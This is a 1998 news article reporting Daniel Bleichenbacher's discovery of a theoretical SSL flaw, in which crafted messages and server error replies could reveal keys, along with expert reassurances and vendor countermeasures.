Hole in Internet security discovered
June 30, 1998
by Brian McWilliams
(IDG) -- A computer scientist at Bell Labs has found a flaw in the Secure Sockets Layer, the encryption protocol used by many Web sites to secure transactions such as purchases and the exchange of sensitive information. Daniel Bleichenbacher said on Friday that in February he discovered an obscure way to guess the key used to encrypt an SSL transaction. The attack involves flooding a Web server with specially designed messages and then analyzing the error messages that come back.
While it's only a theoretical attack and hasn't been tested in the real world, Bleichenbacher's discovery has sent Web security software firms scrambling to develop patches. But Bleichenbacher says there's no need for Internet users to be alarmed.
"I don't think that consumers have to be ... concerned about this attack," says Bleichenbacher. "The attack must send about 1 million messages to a server, and the server will of course notice that there is something wrong ... and create error [messages]."
So many error messages, says security expert Simson Garfinkel, that the logs of the server under attack could balloon to 300MB, potentially causing a hard-disk crash. The result would be a form of denial of service attack.
Garfinkel confirms that browser users face no privacy or security threats from the new hole. "For a consumer there's basically no risk," he says. "This is an attack that is very difficult to mount and leaves very obvious traces. And furthermore it's an attack that can be fixed -- it's not a fundamental flaw in the protocol."
Indeed, RSA Data Security, the company that developed a technology on which SSL is based, announced on Friday that it is working with a group of leading Internet-software vendors on preemptive countermeasures for thwarting such attacks.
Microsoft and Netscape Communications also
reassured users of their Web browsers that no changes
are necessary on the client side of an SSL connection.
Sunday 1:30pm - 2:00pm ET (10:30am - 11:00am PT)
Saturday 1:30pm - 2:00pm ET (10:30am - 11:00am PT)
Back to the top
© 2000 Cable News Network. All Rights Reserved.
Terms under which this service is provided to you.
Read our privacy guidelines.